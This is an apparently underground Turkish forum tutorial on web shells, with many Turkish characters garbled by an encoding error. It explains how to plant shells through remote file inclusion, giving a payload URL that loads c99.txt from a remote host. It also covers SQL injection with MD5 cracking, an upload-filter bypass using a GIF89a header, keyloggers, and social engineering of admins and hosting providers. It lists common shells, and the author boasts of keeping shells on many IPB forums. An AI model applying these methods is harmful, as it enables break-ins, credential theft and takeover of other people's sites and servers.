Shell Nedir? Nas�l At�l�r? Neye Yarar?
  Sorular. Maddeler. Ba�l�klar.

1) shell nedir?
2) shell Nas�l At�l�r?
3) Ka� T�r shell Vard�r?

Cevaplar.

1) shell nedir?

shell Y�klendi�i Sitede Size �e�itli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Att���n�z Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz.

Permissionlar� A��k Olan Bir Sunucuda �stedi�iniz B�t�n Dosya ve Klas�ri Okuyabilir, Silebilir veya Y�kleme Yapabilirsiniz. Permissionlar� Kapal� Bir Sunucuda �se Bu Yetkiler S�n�rl�d�r. Tam Yetkiye Ula�abilmeniz ��in Serveri Rootlaman�z Gerekmektedir.

Bir shelli En �yi Shelikde Kullanabilmek ��in shell Komutlar�n� �yi Bilmek Gerekir. Bunun Sebebi �se S�n�rl� Yetkiniz Olan Sunucularda Tam Yetkiye Sahip Olman�z ��indir.

Bir �ok Sunucuda Manuel Ge�i�lere �zin Verilmektedir. Spoll/Mail K�sm�ndan Sunududaki Di�er Sitelerin Kullan�c� Ad�n� ��renerek Adres �ucu�undan Manuel Ge�i�lerde Yapabilirsiniz.

Baz� Durumlarda �se shell Y�kledi�imiz Sitede Ya Permissionlar S�n�rl� Yetkilere Sahiptir, Yada Yine Sadece Y�kledi�imiz Sitede S�n�rs�z Yetkiye Sahip Olabiliyoruz. Burada S�n�rs�z Yetkimiz Var �se ve Sadece �ndex At�p ��kmak �stiyorsak �ndex.html Dosyam�z� Upload Eder ��kar�z. Eyerki Yetkilerimiz S�n�rland�r�lm�� �se Sitedeki Config Dosyalar�n� Okuyarak SQL �le Ba�lant� Sa�laya Biliriz.

shelli Ne ��in ve Hangi A�amalarda Kulland���m�z� Hacker Diliyle Anlatt�m Bir Di�er Maddeye Ge�elim. Bu Maddemizde Anlamad���n veya Yeniden Anlat�lmas�n� �stedi�iniz Bir Yer Olursa Konu Ald�nda Belirtiniz.

2) shell Nas�l At�l�r?

A�amalar�:
* Remote File Iclusion A��klar�ndan Faydalanabiliriz
* SQL Injection A��klar�ndan Faydalanabiliriz
* Exploits Kullanarak Y�kleme Yapabiliriz
* Upload A��klar�ndan Faydalanabiliriz
* Logger vb Spy Yaz�l�mlardan Faydalanabiliriz
* Hedef Sunucudan Hesap A�arak Y�kleme Yapabiliriz
* Sosyal M�hendislik Kullanarak Y�kleme Yapabiliriz

1) Remote File Inclusion A��klar�n� Kullanarak .Txt Uzant�l� shellimizden Yukar�da Bahseti�im Yetkiler �er�evesinde (Permissionlar) �stedi�imiz Gibi .Php Uzant�l� shell Y�kleyebiliriz. veya Ba�land���m�z .Txt shell ile Yine Sunucu Yetkileri �er�evesinde Alt Dizinlere Ge�ebiliriz yada �ndeximizi Upload Eder ��kar�z.

�rnek:

http://www.siteadi.com/�ndex.php?denetim=Http://siteadi.com/c99.txt?

�le Ba�land���m�z Siteye .php Uzant�l� shelli Upload Edersek Kullan�m� �u �ekilde Olur.

http://www.siteadi.com/c99.php

�eklinde Kullan�ma Ge�ebiliriz.

RFI Konusunu Art�k Bilmeyen Yok �uanda RFI Bitmesede �ok Nadir Rastlanan A��klar Haline Deldi. Bu Y�zden B�t�n Hakcing Bilgilerinizi RFI A����na Ba�lamay�n.

2) SQL Injection A����yla Nas�l shell Atacaz. �ncelikle SQL A����n� Kullanmas�n� Bilen Mant��� Hemen Anlar, nedir Bu Mant�k? SQL Kodlar� Yard�m�yla Site Sahibinin Kullan�c� Ad� ve �ifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde �ifre Gelir, Bizde MD5 Cracker Yard�m�yla K�rar�z.

Elde Etti�imiz Kullan�c� Ad� ve �ifre �le Siteye Giri� Yapar�z Admin Panelden Bir Upload Yeri Bulur shell Dosyam�z� (.php veya .asp) Upload Ederiz ve Yine Sunucuya Ba�lanm�� Oluruz.

SQL �uanda Kullan�lan Yayg�n Hacking Y�ntemlerinden Biridir. �ok B�y�k Sitelerde Bile Rastlanan Hi� De�ilse Her Serverde En Az 1 den Fazla Sitede Rastlanan A��kt�r.

3) Exploits Kullanarak shell Atabiliriz Buda Yine Derlenmi� Exploitler Sayesinde Sitenin Admin Bilgilerini (kullan�c� ad� ve �ifresini) Elde Ederek Admin Panelden shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde ��lem Yapabiliriz.

Buna ��yle Bir �rnek Vereyim, Bir D�nem IPB Forumlar�nda Exploits Sayesinde Admin �ifrelerine Ula�abiliyorduk. Hala �o�u IPB Forumlar�nda shellerim Bulunmakta.

4) Upload A��klar�ndan Faydalanarak Sitelere shell Y�kleyebiliriz. Burada Genellikle .php veya .asp Uzant�l� shellerimizi Kabul Etmeyen Upload Siteleriyle Kar��la��yoruz. Bunun ��in shell ��ine GIF89;a Yaz�s�n� Ekleyerek Upload Sayfas�n�n Y�kleyece�imiz shelli Resim Dosyas� Olarak G�rmesini Sa�lar�z.

Akl�n�z�n Almayaca�� Kadar �ok Upload Dosyalar� Vard�r. Bunlardan En �ok Kullan�lan Bir �ki Tanesini Yazay�m.

upload.php , upload.asp , upload.htm , upload.html

Bu Uzant�lar� ve Upload Sayfalar�n� Hayal G�c�n�ze Ba�l� �o�alta Bilirsiniz.

5) Hi� Tavsiye Etmedi�im ve Hi� Kullanmad���m Ancak Buda Bir Hacking Y�ntemi Oldu�u ��in A��klamak Zorunda Kald���m Bir Y�ntem. Logger vb Spy Yaz�l�mlar Sayesinde shell Nas�l At�l�r? �ncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb ��lemleri Ger�ekle�tirdikten Sonra Loggeri Yedirip Admin �ifreleride Dahil Olmak �zere FTP ve Mail �ifrelerini Al�r�z. Ald���m�z �ifreler Sayesinde Site Sahibinin Yetkilerini Almam�za Ra�men FTP Sine Girdi�imiz Sitenin Sunusunada Ula�mak �stiyorsan shell Upload Eder ve Yetkilerimiz �er�evesinde �zinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.

6) Bu Maddemizde �se Diyelimki Hedef bir Site var. Sitede Her �eyi Yapmam�za Ra�men Bir T�rl� A��k Bulamad�k. Genelde Son �are Olarak Kullan�lan Bu Y�ntemle Hostcuyla �rtibata Ge�er SM Yaparak Sunucudan Bir Hesap A�ar�z A�t���m�z Hesapta G�z Boyamak Ad�na Ufak Tefek Portallar Kurar ve FTP mize shell Atarak Serveri Rootlar Hedef Siteye Ula��r�z veya Manuel Ge�iler Yaparakda Hedef Siteye Ula�abiliriz.

7) Sosyal M�hendislik Y�ntemiyle Siteye shell Y�kleye Biliriz. Burada ��in ��ine SM Girdi�i ��in Belirli Bir Y�ntem Yoktur. Ancak SM Yapan Ki�inin Kabiliyetine Ba�l�d�r. Bir Ki�i Sosyal M�hendislik Yapabilecek Kabiliyetteyse �ok Kolay ve Rahat Bir �ekilde �e�itli Yollarla Siteye veya FTP ye Ula�arak shell Atabilir.

shell Nas�l At�l�r Maddemizde Burada Bitmi�tir. Yukar�da Belirtti�im 7 Madde �o�alt�labilir. Bu Konuda da Anlamad���n�z veya Daha Detayl� Anlatmam� �stedi�iniz Yerleri Konu Alt�na Belirtirseniz Farkl� veya Daha Geni� Anlat�mlar Yapabilirim.

3) Ka� T�r shell Vard�r?

Genel Olarak Kullan�lan 2, 3 �e�it shell Vard�r. Bunar�n Uzant�lar� .php, .asp ve .aspx Dir. �uanda Zannediyorum 100 lerce shell Var Ancak Hemen Hemen Hepsinin �al��ma Mant��� Ayn�.

En�ok Kullan�lan sheller:

C99.php (Yeni Ba�layanlar ��in Kullan�m� Kolay Bir shell)
R57.php ( shell Olay�n� Art�k ��zm�� Kod Bilgisine D�ken Ki�iler Kullan�yor)
CyberSpy5.asp ( Genelde Kulland���m sheller Aras�ndad�r.)
LORD.aspx ( Zaman Zaman Kulland���m Bir shelldir.)
c99 veya r57 .txt sheller ( Bunlar RFI ��in Kullan�lan shellerdir)
NOT: RFI de .asp shell veya .php shell Kullan�lmaz.

�imdi ��yle Bir Bakal�m.

.php Uzant�l� sheller Unix, Linux, FreeBSD Sunucular�nda Kullan�l�r.
.asp Uzant�l� sheller �se Windows Sunucularda Kullan�l�r.

�imdi Siz Bir Linux Servere .asp Uzant�l� shell Atamazs�n�z Atsan�z Dahi �al��t�ramazs�n�z.

Ancak Windows Serverlere Nadirende Olsa Rastlam���md�r. .php Uzant�l� sheller At�labiliryor. Ancak .asp shell Kadar Yetki Vermiyor. Genelde Editleme Yetkisine Rastlad�m. Y�kleme ve Silme Yetkileri Bulunmamakta.

Bu Y�zden shell Y�kleyece�iniz Sitenin Sistemi �yi Bilmeniz Gerekiyor.